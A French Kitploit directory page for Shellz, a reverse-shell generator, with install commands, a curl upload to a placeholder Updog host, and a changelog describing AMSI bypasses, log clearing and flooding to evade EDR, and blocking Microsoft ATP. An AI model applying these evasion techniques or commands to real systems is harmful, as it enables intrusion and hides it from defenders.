Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
shells — Script pour générer des revshells | Kitploit
Outils/GitHubGitHub/4ndr34z/shells
Génération de PayloadsExploitationRétro-ingénierieShellcodePost-ExploitationCTFTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingGénération de ShellcodeDéveloppement de Charges Utiles
48792il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub4ndr34z/shells

shells

Script pour générer des revshells

Voir le dépôt

Shellz

Un script pour générer rapidement et facilement des revshells courants.
Particulièrement pratique lorsque vous avez besoin de revshells PowerShell et Python, qui peuvent être un vrai casse-tête à formater correctement.

Revshells PowerShell

  • Affiche utilisateur@ordinateur.(domaine), au-dessus de l'invite et du répertoire de travail
  • Dispose d'un contournement AMSI partiel et complet.
  • Shells TCP, UDP et SSL
  • Nouveau revshell TCP personnalisé !
  • Nouveau revshell SSL personnalisé !
  • Chargement réflexif de l'incroyable Sharpcat de theart42
  • Windows PowerShell et PowerShell Core
  • Fonctions de téléchargement et d'upload de fichiers. (Utilisation d'Updog par sc0tfree)

Python

  • Pas de PowerShell ? Pas de problème ! Chargez Python embarqué. Fichiers signés et approuvés par Microsoft Intelligent Security Graph.

Support ngrok

  • ngrok peut être démarré/arrêté depuis le script
  • Les payloads seront générés avec les adresses ngrok

Support Updog

  • Vous pouvez démarrer/arrêter Updog depuis le script
  • Les revshells PowerShell ont une fonction d'upload/téléchargement intégrée
  • Pour uploader depuis nix avec curl : curl -F path="chemin absolu du dossier Updog" -F file=nomdufichier http://AdresseUpdog/upload

Pour installer Shells depuis git

root@kitploit:~
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

Pour installer shells sur BlackArch :

root@kitploit:~
pacman -S shellz

Captures d'écran

Main Netcat pwsh screenshot3 screenshot4 screenshot5 screenshot6

Dépendances requises

netcat, rlwrap, jq, basenc (coreutils)

Dépendances optionnelles

updog, ngrok, xclip

Vidéo Youtube

Shellz 1.7.5

Version 1.7.7

  • Ajout de l'option Windows Terminal Init dans la section PowerShell

Version 1.7.6

  • Ajout d'une option sous Python pour utiliser Python embarqué dans une macro VBA

Version 1.7.5

  • Ajout d'une option sous PowerShell pour le chargement par étapes d'un contournement du mode langage contraint via msbuild.exe

Version 1.7.4

  • Modification du payload pour Python embarqué. Le script n'est plus sauvegardé sur le disque
  • Légèrement obscurci le revshell Python

Version 1.7.3

  • Correction d'une faute de frappe dans le payload Python3 pour Windows
  • Ajout d'une option pour utiliser Python embarqué afin d'obtenir un revshell sur une machine Windows sans Python installé et sans utiliser PowerShell.

Version 1.7.1

  • Ajout de PS dans l'invite du shell SSL
  • Raccourcissement du contournement AMSI complet

Version 1.7

  • Suppression du message "updog n'est pas en cours d'exécution" lorsqu'il n'a pas été activé au préalable
  • Suppression de quelques sélections automatiques dans les menus

Version 1.6.9

  • Correction d'une erreur dans la commande block MDE
  • Ajout des options de commande init : cmd, conhost, powershell (Si le payload dépasse 8191 caractères, il doit être initié directement depuis powershell)

Version 1.6.8

  • Remplissage de "Microsoft-Windows-PowerShell/Operational" avec encore plus d'entrées, pour être sûr de repousser l'exécution initiale du script. (Fonctionne uniquement si la journalisation des blocs de script est activée sur la cible)

Version 1.6.7

  • Seul le codage Base64 adapté aux URL était disponible. Ajout du codage Base64 standard des payloads.

Version 1.6.6

  • Ajout d'une option pour remplir le journal PowerShell. Cela démarrera un ensemble de sessions PowerShell, passera une longue chaîne et se fermera. Cela remplira le journal lorsque la journalisation des blocs de script est activée, repoussant ainsi les entrées précédentes du journal et supprimant l'événement de la création du shell lui-même. Peut empêcher la détection par EDR. Testé avec succès sur SentinelOne.
  • Correction des sélections de menu confuses. Suppression des sélections automatiques sur la plupart des menus.
  • Ajout d'un écouteur Metasploit Multi/handler

Version 1.6.5

  • Ajout du correctif ETW PowerShell
  • Ajout du contournement AMSI complet intégré PowerShell
  • Ajout de la vérification de la longueur du payload. La longueur maximale de la chaîne que vous pouvez utiliser dans l'invite de commande Windows (cmd.exe) est de 8191 caractères.

Version 1.6.4

  • Correction du shell SSL PowerShell

Version 1.6.3

  • Ajout de l'expansion de variables sur le payload PowerShell, permettant son exécution depuis des fichiers batch sans modification

Version 1.6.2

  • Renommage en Shellz

Version 1.6.1

  • Écouteur démarré dans une nouvelle fenêtre. (Optionnel sous Linux)

Version 1.6

  • PowerShell : Ajout d'une option pour le chargement réflexif de Sharpcat

Version 1.5.9

  • PowerShell : Nouveau shell SSL personnalisé
  • PowerShell : Ajout d'options pour choisir TCP/UDP/SSL
  • PowerShell/OpenSSL : Écouteur par défaut correct lors de l'utilisation de SSL

Version 1.5.8

  • Mise à jour de l'installateur pour utiliser un script wrapper (pensez à supprimer /usr/local/bin/shells lors de la mise à jour depuis une version < 1.5.8)

Version 1.5.7

  • PowerShell : Construction d'un revshell TCP unique, n'utilisant pas Net.Sockets.TCPClient
  • PowerShell : Les messages d'erreur distants sont désormais correctement affichés

Version 1.5.6

  • PHP : ajout d'options et de plus de payloads

Version 1.5.5

  • Ajout d'une option sur les autres payloads pour changer de shell

Version 1.5.4

  • PowerShell : Correction du payload NIX
  • PowerShell : Mise à jour du payload pour le chargement réflexif C#

Version 1.5.3

  • PowerShell : Ajout d'options pour le payload dans le menu.

Version 1.5.2

  • PowerShell : Changement du revshell pour contourner davantage d'éditeurs d'antivirus
  • Powershell : Ajout d'une règle de pare-feu, empêchant MS ATP de contacter son serveur (si l'utilisateur actuel a les droits)
  • PowerShell : Mise à jour de VBA (macros MS Office)

Version 1.5.1

  • PowerShell : Désactivation de la journalisation des blocs de script et de CheckSuspiciousContent
  • PowerShell : Efface les journaux d'événements PowerShell (si l'utilisateur actuel a les droits)

Version 1.5.0

  • PowerShell : Ajout de payloads VBA pour les macros MS Office
  • Ajout de quelques payloads node.js

Version 1.4.9

  • Ajout d'un simple shell C#.
  • Ajout d'un payload pour charger réflexivement le shell C# en mémoire. (Nécessite le contournement AMSI complet)
  • Couverture de cela en ajoutant le contournement AMSI complet de Rastamouse
  • PowerShell : Vous pouvez automatiquement télécharger et exécuter le contournement AMSI complet. Le contournement AMSI partiel rend cela possible.
  • Shell C# : Télécharge et exécute automatiquement le contournement AMSI complet avant de le charger en mémoire
  • Statut d'Updog et ngrok affiché dans chaque menu

Version 1.4.8

  • Parfois, moins c'est plus. Suppression de l'obfuscation sur les revshells PowerShell TCP/UDP, car cela déclenche en réalité plus l'AV que cela ne le contourne et le payload devenait vraiment volumineux :-) Utilisation toujours de l'aléatoire.

Version 1.4.6

  • Ajout de webshells (ASPX, PHP, JSP)

Version 1.4.5

  • Ajout de 2 binaires revshell c++ pour Windows 32 et 64 bits.

Version 1.4.4

  • Correction de la gestion du démarrage/arrêt d'Updog

Version 1.4.3

  • Ajout du support Updog
  • Ajout de binaires Netcat.
  • PowerShell : Création de la fonctionnalité d'upload/téléchargement (l'upload nécessite Updog pour recevoir les fichiers)
  • Ajout d'informations sur l'exécution de ngrok et Updog.

Version 1.4.2

  • PowerShell : Ajout d'un nouveau "mini contournement AMSI". (C'est un contournement partiel) Basé sur la méthode de réflexion de Matt Graeber
  • PowerShell : Ajout d'une fonction "upload" dans le reverseshell PowerShell

Version 1.4.1

  • Suppression d'AMSI. Pas assez testé :-)

Version 1.4

  • Ajout du contournement AMSI pour les payloads PowerShell

Version 1.3.9

  • Correction d'un bug lors du réglage du port
  • Changement du port par défaut à 443
  • PowerShell : plus d'obfuscation

Version 1.3.8

  • PowerShell : Modifications mineures du payload UDP

Version 1.3.7

  • Utilisation uniquement du nc natif sur macOS, car celui de homebrew ne fonctionne pas pour l'UDP entrant
  • PowerShell : Ajout de payloads UDP

Version 1.3.6

  • PowerShell : Ajout de plus de payloads

Version 1.3.5

  • PowerShell : Ajout d'un peu d'aléatoire et d'obfuscation pour le payload

Version 1.3.4

  • PowerShell : Utilisation de l'encodage UTF8 dans le payload

Version 1.3.3

  • Ajout de Golang

Version 1.3.2

  • Ajout d'OpenSSL

Version 1.3.1

  • Correction d'un bug dans le revshell Python
  • Ajout d'awk
  • Ajout de Bash UDP

Version 1.3

  • Ajout de revshells Python Windows

Version 1.2.9

  • Ajout d'un statut d'exécution de ngrok

Version 1.2.8

  • Masquage du choix ngrok s'il n'est pas installé

Version 1.2.7

  • Correction des options d'installation : ne pas faire l'option par défaut lorsqu'on appuie sur Entrée sans faire un choix

Version 1.2.6

  • Ajout du support pour ngrok.

Version 1.2.4

  • Ajout d'un script d'installation
  • Ajout d'options d'installation pour vérifier et installer les dépendances manquantes

Version 1.2.3

  • Ajout de quelques shells PHP

Version 1.2.2

  • Ajout de shells pour : Ruby, Perl, Telnet et zsh

Version 1.2.1

  • Ajout de la copie dans le presse-papiers avec pbcopy sur macOS
  • Ajout d'informations sur l'écoute netcat, car les versions macOS ne l'affichent pas

Version 1.2

  • Ajout de shells netcat en boucle. Rappel toutes les 10 secondes. Idéal en cas de perte du shell
  • Ajout d'une vérification pour netcat GNU netcat 0.7.0 Homebrew lors de l'exécution sur macOS

Version 1.1

  • Ajout du support macOS
Télécharger l’outil